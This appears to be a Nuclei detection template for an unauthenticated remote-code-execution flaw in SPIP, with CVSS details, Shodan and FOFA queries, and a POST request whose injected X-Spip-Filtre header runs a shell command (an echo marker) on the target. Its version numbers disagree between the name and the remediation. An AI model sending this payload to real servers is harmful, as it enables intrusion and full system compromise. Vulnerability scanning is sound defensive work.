id: CVE-2026-77806 info: name: SPIP < 4.4.22 - Unauthenticated RCE author: 0x_Akoko severity: critical description: | SPIP < 4.4.21 contains a remote code execution caused by mishandling of the X-Spip-Filtre HTTP request header in analyse_resultat_skel, letting unauthenticated remote attackers execute arbitrary code. impact: | Unauthenticated remote attackers can execute arbitrary code, potentially leading to full system compromise. remediation: | Update to version 4.4.21 or later. reference: - https://securityonline.info/cve-2026-77806-spip-unauthenticated-rce/ - https://blog.spip.net/ classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H cvss-score: 9.8 cve-id: CVE-2026-77806 epss-score: 0.04201 epss-percentile: 0.90295 cwe-id: CWE-94 metadata: max-request: 1 verified: true shodan-query: http.component:"SPIP" fofa-query: body="spip.php" tags: cve,cve2026,spip,rce,unauth,vkev variables: marker: "{{rand_text_alphanumeric(8)}}" flow: http(1) && http(2) http: - raw: - | GET /spip.php HTTP/1.1 Host: {{Hostname}} matchers: - type: dsl dsl: - 'status_code == 200' - 'contains_any(tolower(body), "spip.php", "spip_document", "spip_logo")' condition: and internal: true - raw: - | POST /spip.php?page=sommaire&{{rand_text_alpha(8)}}=%3C%3Fphp%20header(%22X-Spip-Filtre:%20intval|_request|system%22);%20%3F%3E HTTP/1.1 Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded 0=echo {{marker}} redirects: true max-redirects: 3 matchers: - type: dsl dsl: - 'status_code == 200' - 'contains(body, "{{marker}}")' condition: and # digest: 490a00463044022048a8307d6dbe99bddf76ea76d094db1c90e669a1fff017ee56affc94787049430220738b01192a5b341b3ae3e5ab9ad6c3168ec3b2917bff5788d536dce812d573a0:922c64590222798bb761d5b6d8e72950